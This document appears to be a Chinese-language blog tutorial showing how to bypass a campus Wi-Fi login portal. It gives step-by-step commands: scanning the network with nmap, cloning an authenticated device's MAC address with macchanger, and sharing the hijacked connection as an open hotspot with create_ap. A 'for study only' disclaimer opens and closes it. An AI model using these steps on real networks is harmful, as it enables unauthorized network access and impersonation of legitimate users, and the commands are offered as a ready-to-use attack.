本文僅供學習,請勿用於任何違法行爲
引言
現在很多地方都有公共wifi,但是很煩人的是很多免費wifi都需要登陸認證,那種微信認證還好,至少能用,但是在某些地方,比如校園內,往往需要正確的賬號密碼才能獲取網絡權限,本文就以校園wifi爲例子,嘗試繞過這個認證系統
裝備
樹莓派PI3 B+(內置kali linux)
充電寶
無線網卡
手機(包含termius和終端模擬器)
數據線
核心原理
把網卡的mac地址改爲某個已通過認證的設備的mac地址,欺騙服務器達到繞過驗證的目的
靈感來源 https://www.youtube.com/watch?v=taAD2z8spP0
前期準備
安裝macchanger
apt-get install macchanger
安裝create_ap以及所需要的支持庫(用於開啓熱點)
git clone https://github.com/oblique/create_ap
cd create_ap
make install
apt-get install util-linux procps hostapd iproute2 iw haveged dnsmasq
步驟1 ssh連接進入樹莓派
綜合了衆多因素之後,筆者決定使用手機連接進入樹莓派
主要原理是通過usb共享網絡的方式讓樹莓派進入局域網內,然後通過查arp獲取它的內網ip,再通過termius進行ssh連接
連接
首先連線,在手機上開啓usb流量共享
終端模擬器中輸入
cat /proc/net/arp
查看樹莓派的內網ip
在termius中輸入ip,連接進入
(爲了截屏方便,下面的操作將在電腦上用xshell演示,並用手機開熱點模擬需要登錄認證的免費wifi)
尋找已認證的mac地址
這裏可以使用kali自帶的nmap,掃描局域網內存活的設備即可(當然也可以用airodump,只是用那個會稍微麻煩點)
nmap -sP xxx.xxx.xxx.1/24
然後尋找一個心儀的目標即可
修改mac並連接
網卡:
wlan0爲樹莓派自帶的網卡(用於獲取網絡權限)
wlan1爲外接網卡,用於開熱點
wlan2爲外接網卡,用於連接家中的wifi然後通過局域網ssh操作樹莓派
首先關閉network-manager服務(會影響用終端連接wifi)
service network-manager stop
然後更改mac地址(這裏設B8:27:EB:59:5C:20爲已通過認證的MAC地址)
ifconfig wlan0 down
macchanger -m B8:27:EB:59:5C:20 wlan0
ifconfig wlan0 up
接着連接wifi(這裏設免費wifi ssid爲WIFI)
此時已成功連接免費wifi,在真正操作時,連接完成後還應測試一下是否能聯網(比如ping www.baidu.com)
開熱點造福人類
這裏用create_ap工具即可
create_ap wlan1 wlan0 FREE-WIFI
當然,也可以選擇加個密碼,具體的命令可以去看命令提示
最後,手機連接,正常上網
本文僅供學習,請勿用於任何違法行爲